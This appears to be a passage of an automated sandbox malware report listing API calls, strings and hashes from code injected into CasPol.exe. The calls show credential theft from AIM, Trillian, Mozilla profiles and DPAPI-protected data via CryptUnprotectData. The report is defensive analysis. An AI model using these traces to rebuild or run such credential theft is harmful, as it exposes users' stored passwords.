                                                                                                                                                                                      • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
                                                                                                                                                                                    • memset.MSVCRT ref: 00408120
                                                                                                                                                                                    • strlen.MSVCRT ref: 00408160
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,?), ref: 0040817F
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?), ref: 0040818C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset$_mbscpy$strlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2712745786-0
                                                                                                                                                                                    • Opcode ID: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
                                                                                                                                                                                    • Instruction ID: bdbe0c05a74f47d21f032104af17620136749afb05b7a30319e2a8bb584ff9b0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
                                                                                                                                                                                    • Instruction Fuzzy Hash: AC3194728001099ACF14EF65DC85BDE77BCAF44304F00446FE549E7181EB74A68A8BA5
APIs
• memset.MSVCRT ref: 0040B91A
  • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
  • Part of subcall function 0040876F: memcpy.MSVCRT(00000000,00000001), ref: 00408877
  • Part of subcall function 0040876F: _mbscpy.MSVCRT(0041E308,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403FEE,MessenPass), ref: 004087EA
  • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
  • Part of subcall function 00407034: memset.MSVCRT ref: 00407055
  • Part of subcall function 00407034: sprintf.MSVCRT ref: 0040707E
  • Part of subcall function 00407034: strlen.MSVCRT ref: 0040708A
  • Part of subcall function 00407034: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 0040709F
  • Part of subcall function 00407034: strlen.MSVCRT ref: 004070AD
  • Part of subcall function 00407034: memcpy.MSVCRT(00000001,?,00000001,?,00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 004070BD
  • Part of subcall function 00406E60: _mbscpy.MSVCRT(?,?), ref: 00406EC6
Strings
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 2726666094-3614832568
APIs
• memset.MSVCRT ref: 00408C55
• GetPrivateProfileStringA.KERNEL32(0041E308,0000000A,00417C88,?,00001000,0041E200), ref: 00408C77
• _mbscpy.MSVCRT(?,?), ref: 00408C91
Strings
• <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408C3E
• ?@, xrefs: 00408C31
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: PrivateProfileString_mbscpymemset
• String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$?@
• API String ID: 408644273-2377969721
APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: ErrorLastMessagesprintf
• String ID: Error$Error %d: %s
• API String ID: 1670431679-1552265934
APIs
  • Part of subcall function 00404C9D: LoadLibraryA.KERNEL32(crypt32.dll), ref: 00404CAA
  • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData,?,?), ref: 00404CBC
• memset.MSVCRT ref: 00410939
• memset.MSVCRT ref: 0041097A
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: memset$AddressLibraryLoadProc
• String ID:
• API String ID: 95357979-0
APIs
  • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
  • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406806
• memset.MSVCRT ref: 0040A48B
  • Part of subcall function 0041244B: memcpy.MSVCRT(?,<,00000004,?,?,00000000,0040A4AC,?,?), ref: 004124B9
  • Part of subcall function 00409DD6: _mbscpy.MSVCRT(00000000,?,0040A4C1,?,?,?), ref: 00409DDB
  • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
• sprintf.MSVCRT ref: 0040A4D0
Strings
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
• String ID: <%s>%s</%s>$</item>$<item>
• API String ID: 3337535707-2769808009
APIs
  • Part of subcall function 00411D68: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
• memset.MSVCRT ref: 00402873
  • Part of subcall function 00411DEE: RegEnumKeyExA.KERNEL32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
• RegCloseKey.ADVAPI32(?), ref: 004028C2
• RegCloseKey.ADVAPI32(?), ref: 004028DF
Strings
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: Close$EnumOpenmemset
• String ID: Software\AIM\AIMPRO
• API String ID: 2255314230-3527110354
APIs
• memset.MSVCRT ref: 0040D516
  • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
• strlen.MSVCRT ref: 0040D52E
• strlen.MSVCRT ref: 0040D53C
  • Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
Strings
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: strlen$FolderPathSpecial_mbscat_mbscpymemset
• String ID: Mozilla\Profiles
• API String ID: 2008385565-2796945589
APIs
  • Part of subcall function 00407930: FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
  • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
  • Part of subcall function 00406958: memcpy.MSVCRT(00000000,00000000,00000000,00000000,0040D450,trillian,?,?,?,?,?,00000000,00000000), ref: 00406972
• strlen.MSVCRT ref: 00407862
• strlen.MSVCRT ref: 0040786F
  • Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
Strings
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$CloseFind_mbscat_mbscpymemcpy
                                                                                                                                                                                    • String ID: *.*$B@
                                                                                                                                                                                    • API String ID: 470300861-2086290067
                                                                                                                                                                                    • Opcode ID: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
                                                                                                                                                                                    • Instruction ID: 1d68107b6d1fc83258085f2e46244374cde2cc5f318db11bb1f65da7a858b60d
                                                                                                                                                                                    • Opcode Fuzzy Hash: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7F0E972D082166FD200AA66984599BBB9C8F52729F11443FF808B7142D63D6D0643AF
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: 74d8481262f99670515fecde3c31a13fb89e1ae3c69a9c7826832b912e140cc6
                                                                                                                                                                                    • Instruction ID: 5397eece0a1688dd905253f83ef07836dc4e260be7ec153caf65aeba5f13d1a3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 74d8481262f99670515fecde3c31a13fb89e1ae3c69a9c7826832b912e140cc6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 82E04674308210269A24AF3BFE49AC723AC5B54725794852FF808D33A2CE2CCCC0802C